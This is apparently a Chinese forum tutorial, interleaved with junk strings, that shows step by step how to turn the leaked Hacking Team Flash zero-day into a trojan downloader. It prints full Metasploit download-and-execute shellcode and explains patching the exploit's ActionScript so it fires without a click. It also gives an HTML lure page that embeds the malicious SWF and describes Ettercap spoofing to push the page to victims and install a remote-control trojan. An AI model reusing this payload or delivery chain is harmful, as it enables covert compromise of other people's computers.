|
" P2 t2 J% S8 D$ H2 {
三、flash 0day之手工代码修改制作下载者实例入侵演示
@( F. ]; H* t. b* X1 g( a
1 _- b4 x* x$ s/ n. m1 ^2 v+ M7 Z5 H# d- M1 u& `8 |
利用到的工具: $ c) n8 k9 O/ U% }8 f9 ^. W
/ D7 W1 f- Z4 c% ]
$ W/ y( ^" \6 g+ v
Msf
- a" H$ V3 H8 Z6 k' ~) | 5 g" v/ o/ X; z5 z" c1 h
& [/ n1 n7 R5 |( F. z Ettercap
) q$ I* i0 m& x& I+ C, B" q0 G& }: V
; t. h. Q" r/ O2 J2 S8 R1 q% S1 R& I3 m* w) _& {& A: s- m4 b6 \- Z
Adobe Flash CS6 C( n6 I; @. K6 c
" w5 J# |2 T$ r! }8 k x
5 y9 H1 u; i$ H" _; h
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
7 K& w/ v5 D E4 t
: B1 v- ?3 s% P, k7 L9 a4 ^) |
% k/ B4 ^. z. P" | 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
) U3 W; k% Z) R7 I' S; a1 \: Z 6 n2 b6 p& V$ B& m( P& T
! L: i! b. J$ g! b9 l
如图:
) n. @( M U- w3 B5 T- L: I
$ ^3 A% S) {) f) A1 p% T" ?# E: x! j6 [7 ?1 _# @( s
! V8 ?! D4 z! ~ M D2 w& [3 w
# g, Q9 p+ B7 W. n8 Q; s
% B* {% y, d4 B7 n4 h 0 O9 e6 ]- ^. G. v. c4 f5 Q
$ q: a B. m; P7 D, S/ C: l* T' ~( V! M1 U+ N
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: + W7 g5 G2 a) S# H) S/ {
& [4 e9 O) V; L# g1 y) R& E6 S) f5 L. w8 x
# x5 X' W1 }$ v# g2 b
8 G. e8 v- @, y3 C$ H& X" W/ |1 p, `) f5 e
0 B; U8 w, N# g3 s8 F % D7 l8 ~& v ]5 ~) ]1 s
$ T; ?6 k2 }; a0 H7 @7 Q6 {" O 然后执行generate -t dword生成shellcode,如下:
. e4 a$ d7 ~% @# A
6 w- {. V7 M3 m, S) S: t3 v) z+ }5 |3 {- M# e! Z) m' i
* ` Y" S, [( C; S; G% g: k5 t* `3 k% m
8 K3 G; H5 j) }: M1 f, d! I1 D! s2 K6 j' L/ m0 K
复制代码到文本下便于我们一会编辑flash exp,如下:
. J3 ]6 G% T, O5 D2 g* u( p
$ Q; n: m6 c# z1 a" h& S
% K. v9 w$ \& R+ b- z: g( p% H0 x 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, + g7 K+ s: {' q; T1 f# A
, }- C) p% t3 L) L9 L. y
% y! |. v! L3 J7 `3 @
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
0 h' a0 X' V, l + X5 a; V" p* X8 E- I W6 r
- w1 k/ Z+ i( ~6 J 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, / c8 b1 Q% @# [* r2 r
3 a! p6 z; `+ c' }- B* y8 Q6 g
& @3 R9 Z! p8 F/ M4 J# _$ D
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, ) H/ \, l# n) `: {! p
. a4 F2 F. Y( G5 O! r0 h% ?: [! x- [
* [# t' {0 `- a% h/ T( C 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, 7 {) \% ^6 [( D! W' i$ p7 H; X# r
: E' V* T& P$ I+ O a B6 k+ s* E2 N2 H4 L$ t
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
5 O9 M3 D: k4 r- j8 P' @- a2 e" ` 0 t5 d( E; Z' M7 ?
6 {( T5 \ L, T% i; H+ ^) A 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
+ Q" l5 [" e( |6 Q, a1 Q
9 J) q1 @1 X: G' ?9 s
' ]4 j- ]6 @1 p; \- I 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
: K8 p t/ k2 Z {! d1 n # q$ o6 n# a7 S. c8 P" G: B
) W- u: b8 n5 x, Z1 T
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff,
* B% g% o! b/ d; [# l* t- b% R , s/ `1 W3 a E7 z6 v6 B. f6 }0 {
9 R, f: K1 {/ D6 }, v( v, c
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, . \2 o1 t+ R1 G0 }$ P
2 ~8 s4 ~( M" W- x4 n, g1 b) a9 X1 m2 Y$ N
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
9 ^1 b8 t3 b' A/ W" r% H( n ' _) A3 X y. X. |7 H
5 m; V- Y9 e$ ~+ }
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 0 h! Q0 G% L* W4 t: \& h
/ e+ h) i8 r5 q2 }% c
+ i4 s0 U7 o& ?% e 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
6 _ }: ~4 B4 ~9 b# _: w5 W
$ m5 @- c+ P/ X; p2 a3 d/ S: l
6 E( j+ i, I: r m- F' Y- ]8 {2 O2 ? 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000
! A0 t9 h" e" `
; S4 c4 _1 D9 `5 Y5 j! J2 o& R# b+ w. U$ x2 P
+ h& ]0 I4 z& m/ B) q. Z
4 l+ j k# a* ]5 f' X: N+ r: E3 j: N+ N2 i1 P% }
_+ C3 J4 |! u F0 ?: T0 R# t 8 H( l% l* n/ |- z; a0 z' p) a c
% D E& `# z4 w4 Q( a0 k 下面我们来修改flash 0day exp,需要修改三个文件,分别为: 7 S4 V% o5 Q8 D& z3 ~3 l7 I- Z
8 w! m* G, F% {- Q' z' `' s
7 O5 T$ w9 I. A; h: K" F " d/ [) G) O) {' f: K% p4 D
+ y& z- ~ @; b; t
- H' ]1 d, p# G) E( Y& [ 先修改ShellWin32.as,部分源代码如图: G* I& n9 t+ f ^# ^
. T3 O9 _" r% q; @- L0 W$ _3 L: A: Z8 {, q* u+ D
1 n( O. J8 J% D+ {+ C2 m o
% v m# x* J+ Q/ h7 t, ?% z- P6 Q+ S9 Y5 e; k, r
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: . D0 ~ ~3 N9 O2 r. d
' r. [4 Y6 V9 C d7 `4 ~( [9 g! f; L5 T
4 E+ j0 s4 }! \# s/ a$ B
& z) @: G" Z4 G" R4 L5 U1 x
3 K$ H; h. z/ _' V 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
% P7 I P4 K+ c) O& r; q / s( P9 Q) j9 q* b; \$ H$ x$ \
6 j. _& R4 |7 Z; \9 S. h! s 7 |1 z3 F/ j( y
2 A- l" w# P- R. O: l
' B6 w1 |) C, k3 Q" t# r 换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
. E0 D; {: u4 A' k6 O% D6 R$ } 8 G+ h) F" K; W$ {
6 _1 l5 u& a! g/ N, `/ @' K
+ a8 T' O/ v. A2 Y* }
2 c, l) }/ J2 W4 x7 S( u# c' x9 s+ d+ c8 g/ U6 P
( a: W2 N, r; o9 U' M. D. U' M / ]9 e8 m9 q0 k5 _0 ?
; w) W% C% F( m8 y. ?" Z c
! I' ~* }0 @* P1 O- ^% o0 M
8 d) h$ P% O! R; ]' Y8 B
5 X/ j9 O4 H7 H& S: @2 e 然后点保存,下面我们来编译一下,打开 5 d o4 @; O& u
: G5 U; l0 Z4 ^! ^
+ ~& |1 P8 G3 v8 ^0 ~ exp1.fla然后点文件-发布,看看编译没错误
, h1 ^! N9 b) [- D
7 u1 h' |) B0 g: ?9 r, `* N" p8 Z1 r y1 s1 b6 M* d. h/ w4 P, t) Q9 {
4 V3 Z% E; N6 w ]% m
# ]2 x9 z8 v7 U$ u! W4 s4 F! y: c! B% _, b. k$ }" ?& ~# k2 F
# I0 e4 j) d* u) v9 M4 f% S- h& C R6 k " N9 Y* l; Y2 r& h- O
, j" T: j) b9 k ) } s1 M$ i" m2 i; I
$ D7 D# Z6 E! M6 Q5 x
" `; K7 C. V$ T1 }" C: q; C 1 d- y3 H# w* G2 Y7 R
% i5 w6 }% H, B# r4 L- a1 ?5 a0 x& [, F n6 N6 Q: R
然后我们把生成的 7 W' g% }9 r D$ N, f
) k% {0 C4 f' d! r. E. O5 _ P
: {) E/ B1 E7 u! T0 Z3 C exp1.swf丢到kailinux 的/var/www/html下:
) E, K y# K. Q' K) z
; p# s. J, P6 s2 P2 B
# f O8 Q7 ^6 W! O1 M- `5 y! r$ r$ c: y 然后把这段代码好好编辑一下 $ S2 A& p2 X8 V8 g6 F5 @
% D9 I" I5 ~ n4 q4 H$ Z
8 \- b' ^! E$ j# t) b: v: E1 \
8 W( L7 }% q$ _. E0 O( p* I9 i' a; J
. N5 x1 R, v' e- m3 y
0 ^0 M% s9 ~2 y& y( S! N0 y
( ?( H: q6 c$ a& k
1 `9 e& c1 l* O5 A s9 ]4 a- ?
+ W7 x/ ?+ J/ S ' ~* ~$ I8 U$ T6 W
1 x( X3 C1 S% b
3 \. n8 b; L! N/ z % z7 {* W& E: R/ c3 j2 |2 s9 j
+ `: \$ l3 z: _2 z& D5 d
/ I. O) d8 A" `! R" d- {* ?
$ z* Y. b z/ v
( @. U {$ P/ m, y; ]. H, E+ |
. }9 z0 q' W! T, ?9 t : D! _% E! ^$ x% Y% Q; r5 [% T
0 a5 V% R- I, m6 q
8 P D) d, }) h2 ? <!DOCTYPE html>
. E3 X6 {: V; M6 ?, C , v2 _* h l0 r
' [. ~, ]3 y& w+ ]
<html> ! U9 t; s( S1 O' [
( I: E# z% i+ m6 j; X3 g/ u( E4 R% R9 [. [0 d' @0 k
<head>
# A; ^7 w1 i, @
" L$ S2 u( I3 C7 ~- e8 C# ~: N$ Y* `! T! P) F* I' p
<meta http-equiv="Content-Type" content="text/html; # I3 E4 y6 @3 M( p8 \5 c0 H3 R
: P/ Z8 ?, {6 Y, p4 A( C
; j$ a" ?# Q4 V- |. W# L4 T) R charset=utf-8"/>
" D z+ X. X2 Z- F * D' N4 I* u# P- S6 ^
7 x, A1 J( A2 ]6 B </head>
/ ^- L- x* d9 p% J
) R6 ?5 {8 Q/ m0 Y
; h/ Y& d* ?# ]" O+ H/ I6 l <body>
7 g& i7 I8 I7 y) M* a( v5 d1 g $ E: i) y K7 ?5 }" {9 a' n
' q3 K: T; D: Z: a
<h2> Please wait, the requested page is loading...</h2> + z2 ?' I/ J# n4 i( y0 w
5 q# B; K; z0 f- U- `+ U4 I
7 e+ a7 X2 h3 _+ F1 v <br> 2 C7 h5 p! |( _/ L+ k7 z' a _& Y
4 p7 R* |3 j' Q$ O: _0 Y
* l' ~9 ?3 G/ N/ j/ p8 j
<OBJECT ) X; b) d9 h8 l+ @
7 v/ s3 ?) n/ Q4 j( Q& h! K% F X8 o/ u9 j0 p& K: P- Z# s7 U
classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie . o. J) U' q6 z& Q5 C
( N* R8 O! O: B8 A- [
6 e: W- g- O2 G! | VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
) [# y% ^6 J/ S' h& {, S ! M/ B5 b! Q0 c+ i8 h, ^& {
( f1 d9 L3 L% d w! {: y </body>
* @+ { \" C/ z ; V! b z( e& @2 G8 {; f+ i9 Z
5 E7 m, L5 {9 T" ~8 t <script>
# e" ]" q9 U% I9 y; V " h* U4 f. q$ M7 P4 ] F" S; B
3 ~5 F% ]; ]. ] V setTimeout(function () {
9 F. y: {+ o1 [+ X5 L' d 6 I" I6 Q4 {' W
' A8 n) s `+ K& o- K U
9 T# T6 N: }2 ~: g7 p# }) W- }
, z. R5 J; D) p7 P& ?
, k6 X7 p4 ]& [, n: S window.location.reload();
: f1 q( u- X# G$ y( G6 N # C6 |# U7 f( |: r) m7 Q
# y. Z$ c/ [0 V ], E }, 10000);
' }# X/ R1 O; ]0 {: ?9 S # |$ B5 _0 G/ s
, S8 s" Z# E- o& [. C8 U7 _ 5 J6 ~. M: Q2 S3 Q# E/ p' i' R* R
`) |+ b: o: w7 `. }( T! c8 p$ W
" E2 [, n K+ `1 e1 m </script> 4 h6 Y9 Y/ N6 n. D# t
3 Y; h4 P" M6 C0 y9 R1 }. Z
4 J" z8 x* E0 P4 h$ U- _* j5 R; m </html> 4 c7 W9 L8 ]1 w/ l7 a+ r1 u# ^
& ~- N4 {7 v' \, h* [0 U
3 W. q! R1 d( ?0 [ 6 A, h; e0 @, b4 s! R5 I A7 d
( ^6 ^: V2 b& D' q d& D
0 w$ a x. J7 Q |1 @
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: ( v0 ^1 A) S' U+ H1 U9 e
4 {+ E9 Y& g) s$ _% K
9 \. W0 Y5 ~( n( K/ q
6 r. P5 j: z- h. J' N4 R$ N! p7 @
: ~2 b& H0 f, [
; ]# r; V6 `3 U# o6 @ 2 E1 a. w" ^+ A
/ A! Y- ]1 m1 V q9 L- z# u8 x6 }' i, l/ N" `
5 U1 c( d8 k$ _6 Z9 c# P ' @" Q- n4 M F S! E
1 e( n+ w' {8 m# ?8 N. K8 ^
4 n+ s# S8 t! r. z2 f8 D
0 N; E, ?: I! c. D+ B: ]3 S; W6 h7 j s& E9 y! s7 Y* }
; Z4 ]: B6 z! s! `! K2 p
% m& f& z$ M/ w* Z
5 J* ?/ S- e% S, X& q0 E! W 下面我们用ettercap欺骗如图: ! c) W. P: d* S1 e3 i5 I
2 q7 x( M6 l+ S; r, v
" H# ? M& F: [7 f' D) }" ^/ B
: O Y/ @* \: P, V& I ; j/ |% ?0 X5 p" C+ V" ^1 X+ r
" v' H% `0 V9 V7 G( r
9 Y/ i/ o# z7 z( u3 Q 9 Q ?# W/ @; H$ z1 j9 Z
0 p( b5 \8 V1 G
下面我们随便访问个网站看看:
0 U. U: _( C- ~" o8 V k + |$ Y' E7 u1 {, m' X
, h# |0 M5 L) K1 R" I* V 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
: N$ k) ^$ T5 d3 L: c7 M G) k6 W * `" n* U5 V, }3 r8 Q
) w! {; ^4 b5 C$ ~; X3 q5 n! _
8 N W7 P* Y9 w7 l / r {1 T0 g% l
' E, L% w3 }* j$ e" p# J9 a0 {) n
我们看另一台, ' }* G/ O1 K- o0 Z
# y7 a9 q+ o m# w! V0 i' q3 l3 U2 P# p# J4 A7 N6 m
提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。 ! ~0 H c0 Y* l4 `& I7 x0 ?
|